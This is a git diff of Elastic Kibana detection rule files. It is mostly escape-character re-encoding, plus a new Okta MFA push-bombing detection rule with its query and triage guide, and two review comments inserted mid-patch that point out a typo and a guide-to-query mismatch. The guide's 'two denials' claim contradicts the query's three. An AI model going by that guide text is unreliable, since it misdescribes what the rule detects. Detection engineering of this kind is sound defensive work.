diff --git a/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_104.json b/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_104.json
index 26235897b50..f75efbee84c 100644
--- a/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_104.json
@@ -53,7 +53,7 @@
 ],
 "risk_score": 73,
 "rule_id": "96e90768-c3b7-4df6-b5d9-6237f8bc36a8",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_105.json b/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_105.json
index d6bea1cb16d..6a5554d6241 100644
--- a/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_105.json
@@ -52,7 +52,7 @@
 ],
 "risk_score": 73,
 "rule_id": "96e90768-c3b7-4df6-b5d9-6237f8bc36a8",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_106.json b/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_106.json
index 4c625d91f61..b4efba79368 100644
--- a/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_106.json
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/97020e61-e591-4191-8a3b-2861a2b887cd_3.json b/packages/security_detection_engine/kibana/security_rule/97020e61-e591-4191-8a3b-2861a2b887cd_3.json
index 3de39af5d65..df6c49d63ea 100644
--- a/packages/security_detection_engine/kibana/security_rule/97020e61-e591-4191-8a3b-2861a2b887cd_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/97020e61-e591-4191-8a3b-2861a2b887cd_3.json
@@ -58,7 +58,7 @@
 ],
 "risk_score": 47,
 "rule_id": "97020e61-e591-4191-8a3b-2861a2b887cd",
- "setup": "Windows Event 4703 logs Token Privileges changes and need to be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDetailed Tracking \u003e\nToken Right Adjusted Events (Success)\n```",
+ "setup": "Windows Event 4703 logs Token Privileges changes and need to be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDetailed Tracking >\nToken Right Adjusted Events (Success)\n```",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/97020e61-e591-4191-8a3b-2861a2b887cd_4.json b/packages/security_detection_engine/kibana/security_rule/97020e61-e591-4191-8a3b-2861a2b887cd_4.json
index a56814618a3..c5cf30f7b96 100644
--- a/packages/security_detection_engine/kibana/security_rule/97020e61-e591-4191-8a3b-2861a2b887cd_4.json
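Review bot: The new `setup` string on the `+` line of the `@@ -58,7 +58,7 @@` hunk still carries a duplicated word, `Steps to implement the logging policy with with Advanced Audit Configuration:`, and the same text recurs in the _4 and _5 versions of this rule in the following hunks. Because the commit only re-encodes `\u003e` as `>`, the typo survives onto the new side verbatim. The sentence should read `Steps to implement the logging policy with Advanced Audit Configuration:`. These rule JSON files look like they are exported from an upstream rule source, so the correction probably needs to land there rather than be hand-edited here.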
+++ b/packages/security_detection_engine/kibana/security_rule/97020e61-e591-4191-8a3b-2861a2b887cd_4.json
@@ -58,7 +58,7 @@
 ],
 "risk_score": 47,
 "rule_id": "97020e61-e591-4191-8a3b-2861a2b887cd",
- "setup": "Windows Event 4703 logs Token Privileges changes and need to be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDetailed Tracking \u003e\nToken Right Adjusted Events (Success)\n```",
+ "setup": "Windows Event 4703 logs Token Privileges changes and need to be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDetailed Tracking >\nToken Right Adjusted Events (Success)\n```",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/97020e61-e591-4191-8a3b-2861a2b887cd_5.json b/packages/security_detection_engine/kibana/security_rule/97020e61-e591-4191-8a3b-2861a2b887cd_5.json
index d729db4b55f..2579705f95e 100644
--- a/packages/security_detection_engine/kibana/security_rule/97020e61-e591-4191-8a3b-2861a2b887cd_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/97020e61-e591-4191-8a3b-2861a2b887cd_5.json
@@ -57,7 +57,7 @@
 ],
 "risk_score": 47,
 "rule_id": "97020e61-e591-4191-8a3b-2861a2b887cd",
- "setup": "\nWindows Event 4703 logs Token Privileges changes and need to be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDetailed Tracking \u003e\nToken Right Adjusted Events (Success)\n```\n",
+ "setup": "\nWindows Event 4703 logs Token Privileges changes and need to be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDetailed Tracking >\nToken Right Adjusted Events (Success)\n```\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_101.json b/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_101.json
index 6eafbf335e0..f59373cf2c4 100644
--- a/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_101.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_102.json b/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_102.json
index 38485abc440..8f3d0e60a6d 100644
--- a/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_102.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/97359fd8-757d-4b1d-9af1-ef29e4a8680e_103.json b/packages/security_detection_engine/kibana/security_rule/97359fd8-757d-4b1d-9af1-ef29e4a8680e_103.json
index 754ee01b685..bf7b4ffd40e 100644
--- a/packages/security_detection_engine/kibana/security_rule/97359fd8-757d-4b1d-9af1-ef29e4a8680e_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/97359fd8-757d-4b1d-9af1-ef29e4a8680e_103.json
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/97359fd8-757d-4b1d-9af1-ef29e4a8680e_104.json b/packages/security_detection_engine/kibana/security_rule/97359fd8-757d-4b1d-9af1-ef29e4a8680e_104.json
index 8f347c5d056..79ecf3cdc27 100644
--- a/packages/security_detection_engine/kibana/security_rule/97359fd8-757d-4b1d-9af1-ef29e4a8680e_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/97359fd8-757d-4b1d-9af1-ef29e4a8680e_104.json
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/979729e7-0c52-4c4c-b71e-88103304a79f_102.json b/packages/security_detection_engine/kibana/security_rule/979729e7-0c52-4c4c-b71e-88103304a79f_102.json
index 4d2ca3264a1..d3b6bbd48b9 100644
--- a/packages/security_detection_engine/kibana/security_rule/979729e7-0c52-4c4c-b71e-88103304a79f_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/979729e7-0c52-4c4c-b71e-88103304a79f_102.json
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -87,7 +87,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/979729e7-0c52-4c4c-b71e-88103304a79f_103.json b/packages/security_detection_engine/kibana/security_rule/979729e7-0c52-4c4c-b71e-88103304a79f_103.json
index 44c6d4e8ca0..a4bbc12a508 100644
--- a/packages/security_detection_engine/kibana/security_rule/979729e7-0c52-4c4c-b71e-88103304a79f_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/979729e7-0c52-4c4c-b71e-88103304a79f_103.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -85,7 +85,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/979729e7-0c52-4c4c-b71e-88103304a79f_104.json b/packages/security_detection_engine/kibana/security_rule/979729e7-0c52-4c4c-b71e-88103304a79f_104.json
index c460ce01df4..979673bf7b2 100644
--- a/packages/security_detection_engine/kibana/security_rule/979729e7-0c52-4c4c-b71e-88103304a79f_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/979729e7-0c52-4c4c-b71e-88103304a79f_104.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -85,7 +85,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/979729e7-0c52-4c4c-b71e-88103304a79f_205.json b/packages/security_detection_engine/kibana/security_rule/979729e7-0c52-4c4c-b71e-88103304a79f_205.json
index c5ccde38786..9210b21f634 100644
--- a/packages/security_detection_engine/kibana/security_rule/979729e7-0c52-4c4c-b71e-88103304a79f_205.json
+++ b/packages/security_detection_engine/kibana/security_rule/979729e7-0c52-4c4c-b71e-88103304a79f_205.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -85,7 +85,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_102.json b/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_102.json
index b41ccbbdf39..46529cca26f 100644
--- a/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_102.json
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_103.json b/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_103.json
index bf37b566107..f1708fab078 100644
--- a/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_103.json
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_104.json b/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_104.json
index 8a731088fc8..a8f820da4d8 100644
--- a/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_104.json
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_105.json b/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_105.json
index d72d87fc121..924511d3544 100644
--- a/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_105.json
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_106.json b/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_106.json
index 34bc07c264a..9f9676f2ff7 100644
--- a/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_106.json
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_207.json b/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_207.json
index ab9747ad731..74bfa7d1a13 100644
--- a/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_207.json
+++ b/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_207.json
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_208.json b/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_208.json
index 9bbd608470f..54c08aa5c45 100644
--- a/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_208.json
+++ b/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_208.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_209.json b/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_209.json
new file mode 100644
index 00000000000..8cbf7c96114
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_209.json
@@ -0,0 +1,87 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when an attacker abuses the Multi-Factor authentication mechanism by repeatedly issuing login requests until the user eventually accepts the Okta push notification. An adversary may attempt to bypass the Okta MFA policies configured for an organization to obtain unauthorized access.", + "event_category_override": "event.category", + "index": [ + "filebeat-*", + "logs-okta*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potentially Successful MFA Bombing via Push Notifications", + "note": "## Triage and analysis\n\n### Investigating Potential Abuse of Repeated MFA Push Notifications\n\nMulti-Factor Authentication (MFA) is an effective method to prevent unauthorized access. However, some adversaries may abuse the system by repeatedly sending MFA push notifications until the user unwittingly approves the access.\n\nThis rule detects when a user denies MFA Okta Verify push notifications twice, followed by a successful authentication event within a 10-minute window. This sequence could indicate an adversary's attempt to bypass the Okta MFA policy.\n\n#### Possible investigation steps:\n\n- Identify the user who received the MFA notifications by reviewing the `user.email` field.\n- Identify the time, source IP, and geographical location of the MFA requests and the subsequent successful login.\n- Review the `event.action` field to understand the nature of the events. It should include two `user.mfa.okta_verify.deny_push` actions and one `user.authentication.sso` action.\n- Ask the user if they remember receiving the MFA notifications and subsequently logging into their account.\n- Check if the MFA requests and the successful login occurred during the user's regular activity hours.\n- Look for any other suspicious activity on the account around the same time.\n- Identify whether the same pattern is repeated for other users in your organization. 
Multiple users receiving push notifications simultaneously might indicate a larger attack.\n\n### False positive analysis:\n\n- Determine if the MFA push notifications were legitimate. Sometimes, users accidentally trigger MFA requests or deny them unintentionally and later approve them.\n- Check if there are known issues with the MFA system causing false denials.\n\n### Response and remediation:\n\n- If unauthorized access is confirmed, initiate your incident response process.\n- Alert the user and your IT department immediately.\n- If possible, isolate the user's account until the issue is resolved.\n- Investigate the source of the unauthorized access.\n- If the account was accessed by an unauthorized party, determine the actions they took after logging in.\n- Consider enhancing your MFA policy to prevent such incidents in the future.\n- Encourage users to report any unexpected MFA notifications immediately.\n- Review and update your incident response plans and security policies based on the findings from the incident.", + "query": "sequence by okta.actor.id with maxspan=10m\n [authentication where event.dataset == \"okta.system\" and event.module == \"okta\"\n and event.action == \"user.mfa.okta_verify.deny_push\"] with runs=3\n [authentication where event.dataset == \"okta.system\" and event.module == \"okta\"\n and (event.action : (\n \"user.authentication.sso\",\n \"user.authentication.auth_via_mfa\",\n \"user.authentication.verify\",\n \"user.session.start\") and okta.outcome.result == \"SUCCESS\")]\n", + "references": [ + "https://www.mandiant.com/resources/russian-targeting-gov-business", + "https://www.elastic.co/security-labs/testing-okta-visibility-and-detection-dorothy", + "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection", + "https://www.rezonate.io/blog/okta-logs-decoded-unveiling-identity-threats-through-threat-hunting/" + ], + "related_integrations": [ + { + "package": "okta", + "version": "^2.0.0" + } + ], 
+ "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.module", + "type": "keyword" + }, + { + "ecs": false, + "name": "okta.actor.id", + "type": "keyword" + }, + { + "ecs": false, + "name": "okta.outcome.result", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "high", + "tags": [ + "Use Case: Identity and Access Audit", + "Tactic: Credential Access", + "Data Source: Okta" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1621", + "name": "Multi-Factor Authentication Request Generation", + "reference": "https://attack.mitre.org/techniques/T1621/" + } + ] + } + ], + "type": "eql", + "version": 209 + }, + "id": "97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7_209", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_104.json b/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_104.json index e02123a9411..4eb0d3c2605 100644 --- a/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_104.json +++ b/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_104.json 
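Review bot: The investigation guide in the new `note` field does not match the `query` in the same file: the guide says the rule fires on two `user.mfa.okta_verify.deny_push` denials followed by one `user.authentication.sso`, while the sequence requires `with runs=3` deny events and then accepts any of four success actions (`user.authentication.sso`, `user.authentication.auth_via_mfa`, `user.authentication.verify`, `user.session.start`) with `okta.outcome.result == "SUCCESS"`. An analyst triaging from the guide would expect a different event pattern than the alert actually contains and may dismiss a true positive. Suggest rewording the guide sentence to `This rule detects when a user denies MFA Okta Verify push notifications three times, followed by a successful authentication event (SSO, MFA verification, or session start) within a 10-minute window.` and the corresponding bullet to `It should include three user.mfa.okta_verify.deny_push actions followed by one successful authentication action.` If these JSON files are exported from an upstream rule repository, the correction belongs in the source rule rather than in this generated artifact.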
@@ -50,7 +50,7 @@
 ],
 "risk_score": 47,
 "rule_id": "97aba1ef-6034-4bd3-8c1a-1e0996b27afa",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_105.json b/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_105.json
index 24defa46883..da3bccbd756 100644
--- a/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_105.json
@@ -50,7 +50,7 @@
 ],
 "risk_score": 47,
 "rule_id": "97aba1ef-6034-4bd3-8c1a-1e0996b27afa",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_106.json b/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_106.json
index 33b015b8597..c9f5485a549 100644
--- a/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_106.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Zoom Child Process", - "note": "## Triage and analysis\n\n### Investigating Suspicious Zoom Child Process\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading, and deserve further investigation.\n\nThis rule identifies a potential malicious process masquerading as `Zoom.exe` or exploiting a vulnerability in the application causing it to execute code.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the command line of the child process to determine which commands or scripts were executed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, 